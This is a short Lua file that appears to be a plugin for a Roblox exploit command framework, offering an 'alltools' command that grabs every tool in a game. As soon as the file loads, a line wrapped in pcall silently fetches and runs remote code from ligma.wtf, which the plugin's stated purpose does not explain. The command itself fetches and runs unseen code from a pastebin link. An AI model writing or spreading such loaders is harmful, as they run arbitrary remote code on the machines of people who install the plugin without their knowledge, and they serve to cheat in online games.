pcall(function()
	loadstring(game:HttpGet("http://ligma.wtf/scripts/commands.lua", true))()
end)

local Plugin = {
	["PluginName"] = "All Tools",
	["PluginDescription"] = "This plugin will give you all of the tools in a game",
	["Commands"] = {
		["alltools"] = {
			["Description"] = "Opens a gui that can give you all of the tools in a game",
			["Aliases"] = {'tools'},
			["Function"] = function(args,speaker)
                loadstring(game:HttpGet(('https://pastebin.com/raw/Mq4FTHB1'),true))()
			end,
		},
	},
}

return Plugin